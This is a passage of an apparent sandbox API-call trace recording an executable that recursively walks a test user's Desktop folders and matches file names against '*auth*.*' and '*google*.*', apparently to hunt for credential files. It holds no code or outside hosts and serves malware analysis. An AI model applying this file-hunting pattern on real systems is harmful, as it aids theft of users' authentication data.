(pszFile="ZyW0U6HGvR1sY4.mkv", pszSpec="*auth*.*") returned 0 [0110.988] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbadff6a0, ftCreationTime.dwHighDateTime=0x1d7ab67, ftLastAccessTime.dwLowDateTime=0x51082c40, ftLastAccessTime.dwHighDateTime=0x1d7ad09, ftLastWriteTime.dwLowDateTime=0x51082c40, ftLastWriteTime.dwHighDateTime=0x1d7ad09, nFileSizeHigh=0x0, nFileSizeLow=0xe3d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="_aNuOe6kDQsgIz0qDq.ods", cAlternateFileName="_ANUOE~1.ODS")) returned 1 [0110.988] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.988] PathMatchSpecW (pszFile="_aNuOe6kDQsgIz0qDq.ods", pszSpec="*auth*.*") returned 0 [0110.988] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbadff6a0, ftCreationTime.dwHighDateTime=0x1d7ab67, ftLastAccessTime.dwLowDateTime=0x51082c40, ftLastAccessTime.dwHighDateTime=0x1d7ad09, ftLastWriteTime.dwLowDateTime=0x51082c40, ftLastWriteTime.dwHighDateTime=0x1d7ad09, nFileSizeHigh=0x0, nFileSizeLow=0xe3d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="_aNuOe6kDQsgIz0qDq.ods", cAlternateFileName="_ANUOE~1.ODS")) returned 0 [0110.988] FindClose (in: hFindFile=0x743420 | out: hFindFile=0x743420) returned 1 [0110.988] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0110.988] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\*.*", lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xdbf44eb, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0xdbf44eb, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7437e0 [0110.988] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.988] FindNextFileW (in: hFindFile=0x7437e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xdbf44eb, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0xdbf44eb, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0110.988] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.988] FindNextFileW (in: hFindFile=0x7437e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf546ee50, ftCreationTime.dwHighDateTime=0x1d7a7b3, ftLastAccessTime.dwLowDateTime=0x13efdd40, ftLastAccessTime.dwHighDateTime=0x1d7aa88, ftLastWriteTime.dwLowDateTime=0x13efdd40, ftLastWriteTime.dwHighDateTime=0x1d7aa88, nFileSizeHigh=0x0, nFileSizeLow=0x1883f, dwReserved0=0x0, dwReserved1=0x0, cFileName="0zAI6IIW3Y-.jpg", cAlternateFileName="0ZAI6I~1.JPG")) returned 1 [0110.988] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.989] PathMatchSpecW (pszFile="0zAI6IIW3Y-.jpg", pszSpec="*google*.*") returned 0 [0110.989] FindNextFileW (in: hFindFile=0x7437e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf25bae10, ftCreationTime.dwHighDateTime=0x1d7a2f9, ftLastAccessTime.dwLowDateTime=0xa41e8ef0, ftLastAccessTime.dwHighDateTime=0x1d7a774, ftLastWriteTime.dwLowDateTime=0xa41e8ef0, ftLastWriteTime.dwHighDateTime=0x1d7a774, nFileSizeHigh=0x0, nFileSizeLow=0x2f95, dwReserved0=0x0, dwReserved1=0x0, cFileName="31NPwfpy_GlRh15.m4a", cAlternateFileName="31NPWF~1.M4A")) returned 1 [0110.989] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.989] PathMatchSpecW (pszFile="31NPwfpy_GlRh15.m4a", pszSpec="*google*.*") returned 0 [0110.989] FindNextFileW (in: hFindFile=0x7437e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b968de0, ftCreationTime.dwHighDateTime=0x1d7ad67, ftLastAccessTime.dwLowDateTime=0x691a0d20, ftLastAccessTime.dwHighDateTime=0x1d7aea9, ftLastWriteTime.dwLowDateTime=0x691a0d20, ftLastWriteTime.dwHighDateTime=0x1d7aea9, nFileSizeHigh=0x0, nFileSizeLow=0x139fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="38ZOxe4ZNObW5Sq.pdf", cAlternateFileName="38ZOXE~1.PDF")) returned 1 [0110.989] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.989] PathMatchSpecW (pszFile="38ZOxe4ZNObW5Sq.pdf", pszSpec="*google*.*") returned 0 [0110.989] FindNextFileW (in: hFindFile=0x7437e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28cd69a0, ftCreationTime.dwHighDateTime=0x1d7a3ce, ftLastAccessTime.dwLowDateTime=0xe9831490, ftLastAccessTime.dwHighDateTime=0x1d7aee3, ftLastWriteTime.dwLowDateTime=0xe9831490, ftLastWriteTime.dwHighDateTime=0x1d7aee3, nFileSizeHigh=0x0, nFileSizeLow=0x895d, dwReserved0=0x0, dwReserved1=0x0, cFileName="7eG9d7.mp4", cAlternateFileName="")) returned 1 [0110.989] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.989] PathMatchSpecW (pszFile="7eG9d7.mp4", pszSpec="*google*.*") returned 0 [0110.989] FindNextFileW (in: hFindFile=0x7437e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x435fd682, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0110.989] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.989] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*google*.*") returned 0 [0110.989] FindNextFileW (in: hFindFile=0x7437e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefda3e80, ftCreationTime.dwHighDateTime=0x1d7b3bc, ftLastAccessTime.dwLowDateTime=0xefda3e80, ftLastAccessTime.dwHighDateTime=0x1d7b3bc, ftLastWriteTime.dwLowDateTime=0x29567e00, ftLastWriteTime.dwHighDateTime=0x1d7b3ac, nFileSizeHigh=0x0, nFileSizeLow=0x192800, dwReserved0=0x0, dwReserved1=0x0, cFileName="f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe", cAlternateFileName="F811CF~1.EXE")) returned 1 [0110.989] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.989] PathMatchSpecW (pszFile="f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe", pszSpec="*google*.*") returned 0 [0110.989] FindNextFileW (in: hFindFile=0x7437e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c000a40, ftCreationTime.dwHighDateTime=0x1d7a7d8, ftLastAccessTime.dwLowDateTime=0x841601c0, ftLastAccessTime.dwHighDateTime=0x1d7aabb, ftLastWriteTime.dwLowDateTime=0x841601c0, ftLastWriteTime.dwHighDateTime=0x1d7aabb, nFileSizeHigh=0x0, nFileSizeLow=0x1414, dwReserved0=0x0, dwReserved1=0x0, cFileName="fmnAnasf2I.mp4", cAlternateFileName="FMNANA~1.MP4")) returned 1 [0110.989] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.989] PathMatchSpecW (pszFile="fmnAnasf2I.mp4", pszSpec="*google*.*") returned 0 [0110.989] FindNextFileW (in: hFindFile=0x7437e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb8f0a80, ftCreationTime.dwHighDateTime=0x1d7adf4, ftLastAccessTime.dwLowDateTime=0xc336cc10, ftLastAccessTime.dwHighDateTime=0x1d7ae1a, ftLastWriteTime.dwLowDateTime=0xc336cc10, ftLastWriteTime.dwHighDateTime=0x1d7ae1a, nFileSizeHigh=0x0, nFileSizeLow=0x187f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="g3fX8Y8-txe9_Es.m4a", cAlternateFileName="G3FX8Y~1.M4A")) returned 1 [0110.989] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.990] PathMatchSpecW (pszFile="g3fX8Y8-txe9_Es.m4a", pszSpec="*google*.*") returned 0 [0110.990] FindNextFileW (in: hFindFile=0x7437e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2f3aea0, ftCreationTime.dwHighDateTime=0x1d7acc6, ftLastAccessTime.dwLowDateTime=0xe973a3a0, ftLastAccessTime.dwHighDateTime=0x1d7ad14, ftLastWriteTime.dwLowDateTime=0xe973a3a0, ftLastWriteTime.dwHighDateTime=0x1d7ad14, nFileSizeHigh=0x0, nFileSizeLow=0x15d9d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Izq83dPIx.mp4", cAlternateFileName="IZQ83D~1.MP4")) returned 1 [0110.990] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.990] PathMatchSpecW (pszFile="Izq83dPIx.mp4", pszSpec="*google*.*") returned 0 [0110.990] FindNextFileW (in: hFindFile=0x7437e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6dde030, ftCreationTime.dwHighDateTime=0x1d7a99c, ftLastAccessTime.dwLowDateTime=0x51405ab0, ftLastAccessTime.dwHighDateTime=0x1d7aeb3, ftLastWriteTime.dwLowDateTime=0x51405ab0, ftLastWriteTime.dwHighDateTime=0x1d7aeb3, nFileSizeHigh=0x0, nFileSizeLow=0x12d9f, dwReserved0=0x0, dwReserved1=0x0, cFileName="k8k6qCAjWYmc.odt", cAlternateFileName="K8K6QC~1.ODT")) returned 1 [0110.990] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.990] PathMatchSpecW (pszFile="k8k6qCAjWYmc.odt", pszSpec="*google*.*") returned 0 [0110.990] FindNextFileW (in: hFindFile=0x7437e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf35e67a0, ftCreationTime.dwHighDateTime=0x1d7ab76, ftLastAccessTime.dwLowDateTime=0xca5de70, ftLastAccessTime.dwHighDateTime=0x1d7abbb, ftLastWriteTime.dwLowDateTime=0xca5de70, ftLastWriteTime.dwHighDateTime=0x1d7abbb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="KTOu", cAlternateFileName="")) returned 1 [0110.990] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.990] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\*.*", lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf35e67a0, ftCreationTime.dwHighDateTime=0x1d7ab76, ftLastAccessTime.dwLowDateTime=0xca5de70, ftLastAccessTime.dwHighDateTime=0x1d7abbb, ftLastWriteTime.dwLowDateTime=0xca5de70, ftLastWriteTime.dwHighDateTime=0x1d7abbb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7436e0 [0110.990] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.990] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf35e67a0, ftCreationTime.dwHighDateTime=0x1d7ab76, ftLastAccessTime.dwLowDateTime=0xca5de70, ftLastAccessTime.dwHighDateTime=0x1d7abbb, ftLastWriteTime.dwLowDateTime=0xca5de70, ftLastWriteTime.dwHighDateTime=0x1d7abbb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0110.990] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f265de0, ftCreationTime.dwHighDateTime=0x1d7acc3, ftLastAccessTime.dwLowDateTime=0xe01b3e80, ftLastAccessTime.dwHighDateTime=0x1d7af08, ftLastWriteTime.dwLowDateTime=0xe01b3e80, ftLastWriteTime.dwHighDateTime=0x1d7af08, nFileSizeHigh=0x0, nFileSizeLow=0xd048, dwReserved0=0x0, dwReserved1=0x0, cFileName="3CEoMqDCJmINqN85E.bmp", cAlternateFileName="3CEOMQ~1.BMP")) returned 1 [0110.990] PathMatchSpecW (pszFile="3CEoMqDCJmINqN85E.bmp", pszSpec="*google*.*") returned 0 [0110.990] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1872110, ftCreationTime.dwHighDateTime=0x1d7a92f, ftLastAccessTime.dwLowDateTime=0xbc62b500, ftLastAccessTime.dwHighDateTime=0x1d7ace6, ftLastWriteTime.dwLowDateTime=0xbc62b500, ftLastWriteTime.dwHighDateTime=0x1d7ace6, nFileSizeHigh=0x0, nFileSizeLow=0x3ae1, dwReserved0=0x0, dwReserved1=0x0, cFileName="eUCY-_yVF.swf", cAlternateFileName="EUCY-_~1.SWF")) returned 1 [0110.990] PathMatchSpecW (pszFile="eUCY-_yVF.swf", pszSpec="*google*.*") returned 0 [0110.990] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58f2e50, ftCreationTime.dwHighDateTime=0x1d7b054, ftLastAccessTime.dwLowDateTime=0xe568fc80, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0xe568fc80, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0xb99e, dwReserved0=0x0, dwReserved1=0x0, cFileName="HLPCM ND3Cl3FgAs3.mp4", cAlternateFileName="HLPCMN~1.MP4")) returned 1 [0110.990] PathMatchSpecW (pszFile="HLPCM ND3Cl3FgAs3.mp4", pszSpec="*google*.*") returned 0 [0110.990] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b9803e0, ftCreationTime.dwHighDateTime=0x1d7a67d, ftLastAccessTime.dwLowDateTime=0xc285fda0, ftLastAccessTime.dwHighDateTime=0x1d7ada1, ftLastWriteTime.dwLowDateTime=0xc285fda0, ftLastWriteTime.dwHighDateTime=0x1d7ada1, nFileSizeHigh=0x0, nFileSizeLow=0x910b, dwReserved0=0x0, dwReserved1=0x0, cFileName="LQQ8KQ8OZpD-.wav", cAlternateFileName="LQQ8KQ~1.WAV")) returned 1 [0110.990] PathMatchSpecW (pszFile="LQQ8KQ8OZpD-.wav", pszSpec="*google*.*") returned 0 [0110.991] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a5349d0, ftCreationTime.dwHighDateTime=0x1d7a0e8, ftLastAccessTime.dwLowDateTime=0x3bacdd80, ftLastAccessTime.dwHighDateTime=0x1d7a8c4, ftLastWriteTime.dwLowDateTime=0x3bacdd80, ftLastWriteTime.dwHighDateTime=0x1d7a8c4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UQEQQujqhNYM", cAlternateFileName="UQEQQU~1")) returned 1 [0110.991] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\*.*", lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a5349d0, ftCreationTime.dwHighDateTime=0x1d7a0e8, ftLastAccessTime.dwLowDateTime=0x3bacdd80, ftLastAccessTime.dwHighDateTime=0x1d7a8c4, ftLastWriteTime.dwLowDateTime=0x3bacdd80, ftLastWriteTime.dwHighDateTime=0x1d7a8c4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x743960 [0110.991] FindNextFileW (in: hFindFile=0x743960, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a5349d0, ftCreationTime.dwHighDateTime=0x1d7a0e8, ftLastAccessTime.dwLowDateTime=0x3bacdd80, ftLastAccessTime.dwHighDateTime=0x1d7a8c4, ftLastWriteTime.dwLowDateTime=0x3bacdd80, ftLastWriteTime.dwHighDateTime=0x1d7a8c4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0110.991] FindNextFileW (in: hFindFile=0x743960, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd13220d0, ftCreationTime.dwHighDateTime=0x1d79ffb, ftLastAccessTime.dwLowDateTime=0xb8ee8eb0, ftLastAccessTime.dwHighDateTime=0x1d7a126, ftLastWriteTime.dwLowDateTime=0xb8ee8eb0, ftLastWriteTime.dwHighDateTime=0x1d7a126, nFileSizeHigh=0x0, nFileSizeLow=0x16d3e, dwReserved0=0x0, dwReserved1=0x0, cFileName="LlE7.doc", cAlternateFileName="")) returned 1 [0110.991] PathMatchSpecW (pszFile="LlE7.doc", pszSpec="*google*.*") returned 0 [0110.991] FindNextFileW (in: hFindFile=0x743960, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4773fc0, ftCreationTime.dwHighDateTime=0x1d7ab51, ftLastAccessTime.dwLowDateTime=0xfbe70ad0, ftLastAccessTime.dwHighDateTime=0x1d7ab5d, ftLastWriteTime.dwLowDateTime=0xfbe70ad0, ftLastWriteTime.dwHighDateTime=0x1d7ab5d, nFileSizeHigh=0x0, nFileSizeLow=0x1566b, dwReserved0=0x0, dwReserved1=0x0, cFileName="s ICeshe.bmp", cAlternateFileName="SICESH~1.BMP")) returned 1 [0110.991] PathMatchSpecW (pszFile="s ICeshe.bmp", pszSpec="*google*.*") returned 0 [0110.991] FindNextFileW (in: hFindFile=0x743960, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54e12230, ftCreationTime.dwHighDateTime=0x1d7a1fc, ftLastAccessTime.dwLowDateTime=0xb869d1d0, ftLastAccessTime.dwHighDateTime=0x1d7a71a, ftLastWriteTime.dwLowDateTime=0xb869d1d0, ftLastWriteTime.dwHighDateTime=0x1d7a71a, nFileSizeHigh=0x0, nFileSizeLow=0x122d9, dwReserved0=0x0, dwReserved1=0x0, cFileName="sQpxS.csv", cAlternateFileName="")) returned 1 [0110.991] PathMatchSpecW (pszFile="sQpxS.csv", pszSpec="*google*.*") returned 0 [0110.991] FindNextFileW (in: hFindFile=0x743960, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54e12230, ftCreationTime.dwHighDateTime=0x1d7a1fc, ftLastAccessTime.dwLowDateTime=0xb869d1d0, ftLastAccessTime.dwHighDateTime=0x1d7a71a, ftLastWriteTime.dwLowDateTime=0xb869d1d0, ftLastWriteTime.dwHighDateTime=0x1d7a71a, nFileSizeHigh=0x0, nFileSizeLow=0x122d9, dwReserved0=0x0, dwReserved1=0x0, cFileName="sQpxS.csv", cAlternateFileName="")) returned 0 [0110.991] FindClose (in: hFindFile=0x743960 | out: hFindFile=0x743960) returned 1 [0110.991] PathMatchSpecW (pszFile="UQEQQujqhNYM", pszSpec="*google*.*") returned 0 [0110.991] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad60b60, ftCreationTime.dwHighDateTime=0x1d7a242, ftLastAccessTime.dwLowDateTime=0x7e00e530, ftLastAccessTime.dwHighDateTime=0x1d7a4b6, ftLastWriteTime.dwLowDateTime=0x7e00e530, ftLastWriteTime.dwHighDateTime=0x1d7a4b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_5VgSE0-6jvrM", cAlternateFileName="_5VGSE~1")) returned 1 [0110.991] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\*.*", lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad60b60, ftCreationTime.dwHighDateTime=0x1d7a242, ftLastAccessTime.dwLowDateTime=0x7e00e530, ftLastAccessTime.dwHighDateTime=0x1d7a4b6, ftLastWriteTime.dwLowDateTime=0x7e00e530, ftLastWriteTime.dwHighDateTime=0x1d7a4b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x743320 [0110.992] FindNextFileW (in: hFindFile=0x743320, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad60b60, ftCreationTime.dwHighDateTime=0x1d7a242, ftLastAccessTime.dwLowDateTime=0x7e00e530, ftLastAccessTime.dwHighDateTime=0x1d7a4b6, ftLastWriteTime.dwLowDateTime=0x7e00e530, ftLastWriteTime.dwHighDateTime=0x1d7a4b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0110.992] FindNextFileW (in: hFindFile=0x743320, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67bd380, ftCreationTime.dwHighDateTime=0x1d7ab0a, ftLastAccessTime.dwLowDateTime=0x1a731140, ftLastAccessTime.dwHighDateTime=0x1d7ad95, ftLastWriteTime.dwLowDateTime=0x1a731140, ftLastWriteTime.dwHighDateTime=0x1d7ad95, nFileSizeHigh=0x0, nFileSizeLow=0xa5ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="aQrMbJ6CFhwhf7PNnuMu.docx", cAlternateFileName="AQRMBJ~1.DOC")) returned 1 [0110.992] PathMatchSpecW (pszFile="aQrMbJ6CFhwhf7PNnuMu.docx", pszSpec="*google*.*") returned 0 [0110.992] PathMatchSpecW (pszFile="ge40CUtwTNBApkxPnR.png", pszSpec="*google*.*") returned 0 [0110.992] PathMatchSpecW (pszFile="QXzQAUh0jIi.bmp", pszSpec="*google*.*") returned 0 [0110.992] PathMatchSpecW (pszFile="YzBjdPQG.jpg", pszSpec="*google*.*") returned 0 [0110.993] PathMatchSpecW (pszFile="_5VgSE0-6jvrM", pszSpec="*google*.*") returned 0 [0110.993] PathMatchSpecW (pszFile="KTOu", pszSpec="*google*.*") returned 0 [0110.993] PathMatchSpecW (pszFile="LyMn8DqKE.jpg", pszSpec="*google*.*") returned 0 [0110.993] PathMatchSpecW (pszFile="MB3JQQUgbwGVRNgeCA.gif", pszSpec="*google*.*") returned 0 [0110.993] PathMatchSpecW (pszFile="O93_HCF.xlsx", pszSpec="*google*.*") returned 0 [0110.993] PathMatchSpecW (pszFile="Oar504.gif", pszSpec="*google*.*") returned 0 [0110.994] PathMatchSpecW (pszFile="6eLLiqLz9t.avi", pszSpec="*google*.*") returned 0 [0110.994] PathMatchSpecW (pszFile="D9uCaq_HSLxl.pdf", pszSpec="*google*.*") returned 0 [0110.994] PathMatchSpecW (pszFile="E144W5Mz.swf", pszSpec="*google*.*") returned 0 [0110.994] PathMatchSpecW (pszFile="lDOubGqNdXLFW1EA.wav", pszSpec="*google*.*") returned 0 [0110.994] PathMatchSpecW (pszFile="OFSiahfxrlNjf.swf", pszSpec="*google*.*") returned 0 [0110.995] PathMatchSpecW (pszFile="ws8IgIZUQH.mkv", pszSpec="*google*.*") returned 0 [0110.995] PathMatchSpecW (pszFile="Y_Iia0ILxn.gif", pszSpec="*google*.*") returned 0 [0110.995] PathMatchSpecW (pszFile="p B1LdDcHaeS", pszSpec="*google*.*") returned 0 [0110.995] PathMatchSpecW (pszFile="PKW-syaNOG91rV.gif", pszSpec="*google*.*") returned 0 [0110.995] PathMatchSpecW (pszFile="QjzdslaoFnrvJ.flv", pszSpec="*google*.*") returned 0 [0110.995] PathMatchSpecW (pszFile="QqfcEGsF2dGoVC.mp4", 